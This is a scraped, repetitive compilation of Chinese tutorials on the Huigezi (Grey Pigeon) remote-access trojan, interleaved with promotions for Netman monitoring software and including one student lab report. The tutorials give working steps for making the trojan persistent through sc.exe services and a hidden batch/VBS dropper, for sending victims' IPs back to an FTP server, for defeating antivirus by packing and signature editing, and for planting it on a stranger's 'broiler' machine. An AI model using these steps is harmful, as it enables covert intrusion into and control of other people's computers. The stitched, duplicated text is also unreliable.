【黑客视频教程-VMware虚拟机的安装和使用】 https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/VMware1.wmv https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/VMware2.wmv https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/VMware3.wmv 【黑客视频教程-Iris网络嗅探器使用与技巧】 https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/Iris01.wmv

灰鸽子远程控制教程

灰鸽子远程控制教程 灰鸽子远程控制，著名木马灰鸽子远程控制工具，附带中文版键盘记录，多功能图标修改器等！ 准备工具： 鸽子服务端 IcoSprite图标更改器； SC.exe服务添加删除更改工具； winrar 程序特点： 自解压形式，双击即可 制作过程： 1. 首先自己配置一下鸽子服务端，配置时[启动项设置]这里面的都不要填，不要写入注册表，也不要用服务启动。其他的随你个人爱好。 2.用SC创建一个服务 运行CMD.EXE 在system32的目录下运行执行 SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"

‘这句是用SC建立一个服务，服务名为huigezi，路径Binpath为 "%systemroot%\system32\gezi.exe"，类型type为own 与interact交互，启动类型start为自动，显示名DisplayName为"gezi"。 sc.exe descript_ion huigezi "不死鸽子" ‘这句是将huigezi服务的描述改为“不死鸽子” sc config wuauserv depend= huigezi ‘配置huigezi使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的wuauserv是系统在Windows Update网站的自动更新服务）。 这里的目的是迷惑管理员，使其不敢轻易停止我们生成的服务，自己也可以多加点。 3.将这些从注册表导出，我个人经验是：瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg 4.创建一个BAT文件,并命名为update.bat @regedit /s %systemroot%\system32\1.reg @%systemroot%\system32\gezi.exe @del /q /f /s %systemroot%\system32\1.reg @del /q /f /s %systemroot%\system32\Update.vbs @del /q /f /s %systemroot%\system32\Update.bat 5.创建一个vbs并命名为update.vbs 目的是为了作用是令bat里的内容以安静模式执行，这样就可以让cmd窗口跳出来了，增加了不少隐蔽性。

灰鸽子详细使用教程

灰鸽子详细使用教程 2007年02月28日星期三 21:42 灰鸽子新手完全教程（简单上线，简单映射，简单免杀） 首先我们打开我们的鸽子控制端，前面还得关了自己的防火墙哦~我的如下图中 ~顶上抹去的是我的所有IP.好，接下来我们点自动上线FTP服务器就是你FTP空间的地址，帐号密码也添好，存件，我用的是ipipip.txt，个人推荐使用TXT为后缀~填好后记得点下那个自动保存，下次就不用再填了~~最后点到FTP空间~如下图

最后在左下会出先成功，如下图 点配置服务程序，先点自动上线设置，IP通知那里添上你FTP在HTTP的访问地址加上你放IP文件的地址，我放在根目录下的ipipip.txt那么就是下面那样的，所填的这个网址，是应该在IE里访问时，是可以看 到你IP，那么就没错了~连接密码就随你咯，我一般不设置，这我就加个123~我的如下图~

（大家别碰我的FTP空间，谢谢哦~）投降自选，关于文件图标，点选择图标~我是事先有ISO图标，你看我的，的图标~接着点安装选项，安装路径是你肉鸡上的，所以你自己想下装在哪，记的点自动删除~我的在下面~别那哦，我那是JIAOCHENG，大家想些关于系统的吧~接下来点那个启动选项，服务啊什么的改成与系统有关的吧~我

是JIAOCHENG代理跳过，现在别开，以后再开~高级选项点不加壳~如下 ~接着看下生成路径（别自己找不到了~），点生成就好了，如下~

我用今天的卡巴查下，看下面， 有毒~接着我随便拿个加壳器（这个所有的不一定都成，今天我试到第3个才OK）我用的是下面这个~黑器里下的

~接下来我用卡巴再查，你看下面， 没毒~随便找只肉鸡实验一下，比如下面这只，他不走运，就当舍己为人吧，我们默哀半秒钟~传上去后，帮他隐大家看下面，我传了两只~连接时记得加你设置的密码，我的123，OK了吧！

最适合企业用的远程控制软件——网络人远程控制软件

最适合企业用的远程控制软件——网络人远程控制软件 为了保障办公质量、提高办公效率，越来越多的企业使用远程监控软件，对办公室电脑进行监控。但由于“灰鸽子”“狙击手控制软件”等远程木马频频被曝危害计算机安全，并造成较大的公共影响，导致许多人的印象中，远程控制软件就是木马。其实这样的观点是错误的，国内外有很多用于办公的远程控制软件都是非常正规、安全的，如在国外知名的PcAnywhere、TeamViewer，国内火红的网络人（Netman）远程控制软件等。今天就以网络人为例，为大家介绍一下这些不是木马的远程控制软件。 网络人软件下载：https://www.wendangku.net/doc/572022996.html,/soft/71575.htm

一、网络人安全性能说明 网络人不仅通过360安全卫士、卡巴斯基、NOD32、瑞星杀毒软件、金山毒霸、天网防火墙等所有主流安全软件的安全认真，软件本身在安全性方面，也采取了多种保密措施。：1、软件密码采用不可逆解的MD5方式加密。2、数据在输过程采用DSE加密算法。网络人企业版的数据传输使用的是当前最流行的，应用在银行业电子资金转账（EFT）领域中DSE加密算法。该加密标准由美国国家安全局和国家标准与技术局来管理，用户无需担忧数据在传输过程中被截取和破译。3、网络人企业版是P2P软件，连接后数据传输不经过服务器。网络人企业版服务器的作用是协助软件穿透内网，一旦双方连接成功，数据传输就完全在双方电脑之间进行，不通过网络人企业版的服务器。 二、网络人的两大功能 监控功能 网络人(Netman)企业版，是一款远程办公监控软件。主要用于管理、监控办公室电脑，杜绝职员上班处理私事，防止公司资料被非法外带、泄露。软件支持：远程监控多个屏幕桌面，屏幕拍照、录像；远程视频墙监控，视频拍照、录像；进程监控、管理……（公司监控办公电脑，

黑防灰鸽子完全修改教程全部内容

黑防灰鸽子完全修改教程(全部容) 黑防灰鸽子完全修改教程(全部容) 〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓 一.修改标题 二.修改界面文字 三.修改启动画面 四.修改右下图 五.修改关于 六.修改灰鸽子皮肤及托盘图标 七.修改黑防鸽子的一些文字信息

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓用到的工具： C32Asm Restorator ResScope eXeScope Delphi7 Macromedia Fireworks 8 (作图工具) Ulead GIF Animator (作图工具) 灰鸽子VIP2007脱壳版 灰鸽子2006脱壳版

灰鸽子黑防脱壳版 ===================================================== 说明：灰鸽子2006脱壳版是为了提取他的皮肤,如果你不想用VIP2006的皮肤可以不用准备这个版本的灰鸽子。 以上两款作图软件是用于制作启动界面右下角关于 的图片教程中图片已做好没有用到这些软件不会 做图的自己到百度搜索作图相关的教程 〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓一.修改标题 打开灰鸽子黑防脱壳版 配置服务端输入自己的信息

灰鸽子[Vip 2007] 銘少专用版 注意后面加空格 生成服务端 用Restorator 打开 把HACKER 的容复制出来 每16位为一行复制前4行容 D8E23CF3EA4CDCF35FA14EFBE429F5C9FC72171A64E5F4B1FE684375D6 E8C17A 用C32Asm 打开灰鸽子黑防脱壳版 搜索0101 第4处修改上我们的标题信息 保存。。。完成 〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓

灰鸽子远程控制完整详细教程

灰鸽子远程控制完整详细教程 （考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看） 第一部份：网络人远程监控软件 Netman监控版详细安装方法： 1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。 2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program Files\Netman”，可以自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。 出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码，可点击“选项”-“修改密码”。

6.设置好密码密码后，点右上角的关闭按扭，软件就会在后台运行，桌面上看不到任何图标和提示。想要再次操作软件，请按下ctrl+y键。 右上角的关闭按扭只是将软件界面关闭，想要彻底退出软件，应点击左上角的“文件”-“退出”。很多用户想要卸载软件时，发现无卸载，就是因为没有退出程序造成。 7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录，在“远程IP/ID”处输入对方的会员ID和控制密码，点击“连接”即可连接远程电脑。

详细讲解远程控制(内外网上线+使用教程及不上线的原因总结)

教程及其相关知识法律声明 中华红客技术交流基地，网站论坛所涉及所有动画课程、软件、文章仅供为提高电脑技术，普及中国网络安全服务，以求电脑技术爱好者交流探讨为参考，严禁任何组织和个人利用此动画教程培训软件侵入他人电脑等非法活动，中华红客技术交流基地无授意指使他人为之之故意，造成损害中华红客技术交流基地概不负责任何法律责任 中华红客技术交流基地 基地论坛：https://www.wendangku.net/doc/572022996.html, 阶段一：实战攻防篇 课程主题：第一课:详细讲解远程控制**（内外网上线+使用教程及不上线的原因总结） 讲师：习惯就好. 如何判断自己电脑是否内网: 方法一:开始---cmd---ipconfig 出现以下 10.x.x.x； 172.16.x.x至172.31.x.x； 192.168.x.x； 环境准备： 要使用到的工具+环境准备：域名一个 ww https://www.wendangku.net/doc/572022996.html,或者（花生壳域名）+远程控制 远程控制下载地址:https://www.wendangku.net/doc/572022996.html,/42/thread-27658-1-1.html 内网讲解： 内网用户鸽子上线方法,常用的是端口映射方法.分成二种情况. 第一种:如果有路由器的控制权,可以进入路由器设置,把鸽子上线端口映射出去. 第二种:没有路由控制权,只能找公网肉鸡做映射. 第一种：（路由器上线方法） 第一步：路由器上线方法

首先,我们关闭windows防火墙和暂停杀毒软件。我已经关闭了。 我们打开黑防灰鸽子，灰鸽子的自动上线端口是：8000，当然你也可以改成其它的端口。我们打开“命令提示符”输入：ipconfig /all 查看本机的IP ，本机的IP是：192.168.1.254 现在我们要打开路由器，在浏览器的地址栏输入：192.168.1.1。 （如果你的路由器的IP地址改变了，你就输入相应的路由器的IP地址。）我的没有改。 要输入帐号和密码，我用的是TP-LINK路由器，我这个路由器默认的帐号和密码是：admin 和admin。 （当然如果你改变了帐号和密码，你就要输入你改了之后的帐号和密码了） 我们点击“转发规则”选择第一项“虚拟服务器”，输入端口号8000：和本机的IP：192.168.1.254 也可以进入转发规则，进入DMZ主机，直接填写本机的IP地址：192.168.1.254。本地地址必须固定。， 第二种:用肉鸡做映射. 首先扫好：开放9999端口机器，然后利用鸽子的内网映射工具，进行填写映射。 或者配置一个Vport服务端，在具有公网IP的机子上运行Vport服务端. 连接服务端,并进行映射. 第三种：利用加速器，进行上线。 如：VPN,统一加速器等。 外网讲解： 外网的话，就不需要那么繁琐的去映射等操作，直接填写主机名，配置好上线主机的IP或者域名就能直接的上线。 看操作！ 外网IP查询：https://www.wendangku.net/doc/572022996.html, 总结：不上线的远控总结 1.配置信息的问题。

黑防灰鸽子完全修改教程全部内容

黑防灰鸽子完全修改教程(全部内容) 黑防灰鸽子完全修改教程(全部内容)〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓 一.修改标题 二.修改界面文字 三.修改启动画面 四.修改右下图 五.修改关于

六.修改灰鸽子皮肤及托盘图标 七.修改黑防鸽子的一些文字信息 〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓用到的工具： C32Asm Restorator ResScope eXeScope

Delphi7 Macromedia Fireworks 8 (作图工具) Ulead GIF Animator (作图工具) 灰鸽子VIP2007脱壳版 灰鸽子2006脱壳版 灰鸽子黑防脱壳版 =====================================================说明：灰鸽子2006脱壳版是为了提取他的皮肤,如果你不想用VIP2006的皮肤可以不用准备这个版本的灰鸽子。

以上两款作图软件是用于制作启动界面右下角关于 的图片教程中图片已做好没有用到这些软件不会 做图的自己到百度搜索作图相关的教程 〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓一.修改标题 打开灰鸽子黑防脱壳版 配置服务端输入自己的信息 灰鸽子 [Vip 2007] 銘少专用版

注意后面加空格 生成服务端 用 Restorator 打开 把 HACKER 的内容复制出来 每16位为一行复制前4行内容 D8E23CF3EA4CDCF35FA14EFBE429F5C9FC72171A64E5F4B1FE684375D6E 8C17A 用 C32Asm 打开灰鸽子黑防脱壳版 搜索0101 第4处修改上我们的标题信息

灰鸽子破解版教程

灰鸽子破解版教程 （考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看） 第一部份：网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，知道电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用，是一款免费的远程控制软件；Netman监控版使用会员登录后再连接，远程电脑无任何提示，对方不会发觉，主要用于监管孩童电脑，掌握孩子上网情况，保护孩子健康上网。 Netman监控版详细安装方法： 1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。 2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program Files\Netman”，可以自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。 5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。 出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码，可点击“选项”-“修改密码”。

最新灰鸽子远程控制软件教程

最新灰鸽子远程控制软件教程 （考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看） 第一部份：网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，知道电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用，是一款免费的远程控制软件；Netman监控版使用会员登录后再连接，远程电脑无任何提示，对方不会发觉，主要用于监管孩童电脑，掌握孩子上网情况，保护孩子健康上网。 Netman监控版详细安装方法： 1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。 2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program

Files\Netman”，可以自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。 3.完成以上操作后，再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。 5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。 出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码，可点击“选项”-“修改密码”。

灰鸽子远程入侵XP系统

灰鸽子远程入侵XP系 统 课程名称：网络安全概论 班级：计算机科学与技术11-1班 组员：钟海威 陈占刚 周元 刘飞

一、目的及要求 1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。 2、练习软件的哪些功能，自己总结 3、通过实验了解灰鸽子是一款的远程控制软件。 4、熟悉使用木马进行网络攻击的原理和方法。 二、环境 Windows XP操作系统、虚拟机软件、灰鸽子木马软件 三、主要内容 （一）局域网设置： 在两台电脑上打开虚拟机，开启winXP，将其网络设备器设置在同一局域网内

（二）灰鸽子木马处理 灰鸽子使用方法： （1）打开灰鸽子，并查看本机IP地址： （2）点击配置服务程序，新建一个木马病毒（没有设置密码）： （3）将生产的木马病毒设法放入目标主机，并使其运行：

（4）目标主机运行后，本机灰鸽子显示其登录： （5）我们可对目标及进行，下载上传等基本运行。还可以进行更深层次的控制，例如屏幕捕捉与控制，广播，关机开机，注册表的编辑等（看红框标识处）：

（三）免杀： 1、使用MYCCL工具定位特征码： 现今社会杀毒软件的辨识度已然很高，而人们的警惕度也越来越高，木马若想成功的被目标主机运行，必然要做一定的伪装和处理。 （1）概念： （2）原理：修改入口点.或直接入口点加1、加壳加花伪装、修改特征码； （3）使用工具及方法：

2、用OD反编译处理特征码： 经过上一步的过程，已经将木马中的特征码找到，接下来就是决定性的一刻，使用OD（OllyDBG）修改特征码，免杀的过程到此结束。 （1）概念：反编译即反向编译。计算机软件反向工程（Reverse engineering）也称为计算机软件还原工程，是指通过对他人软件 的目标程序（可执行程序）进行“逆向分析、研究”工作，以推导 出他人的软件产品所使用的思路、原理、结构、算法、处理过程、 运行方法等设计要素，作为自己开发软件时的参考，或者直接用于 自己的软件产品中。 （2）原理：在我们所做的免杀中，先使用MYCCL工具定位特征码，通常的方法为修改入口点.或直接入口点加1、加壳加花伪装、修改特 征码。确定特征码后通过OD来修改特征码，常用方法有： ①用通用跳转法：把特征码改跳到其他位置； ②移位调换法：如果是跳转或者call或者mov同时存在，可以尝 试交换；nop移位法； ③大小写修改法； ④指令替换法：add ecx,1改sub ecx,-1; push eax改pop eax； sbb—adc; je 004XXXXX改jnz 004XXXXX； ⑤强制NOP填充：强制把特征码地址处用00 填充，但极大可能造成 致命错误。 我们所做的免杀中用的是通用跳转法----即找到特征码所在地址，把特征码地址NOP（空指令）掉，然后JMP（无条件跳转） 跳转到无用的空数据代码地址处，在空数据区填上刚才NOP掉的 语句。 （3）使用工具及方法： 由于每个病毒都有多个特征码，通过软件OD来进行反编译修改这些特征码，来达到自己所需要的目的。 3、加花加密壳： 通过免杀发现特征码，并且用反编译器修改特征码之后，木马仍然是原来的模样，这是需要进行一定的“装扮”，否则肉鸡们可不会那么轻易 的上当。 （1）概念： （2）原理： （3）加花加密工具及方法： 四、总结 （1）熟悉灰鸽子之后，我们了解了木马的强大以及危害之处，如何防范木马，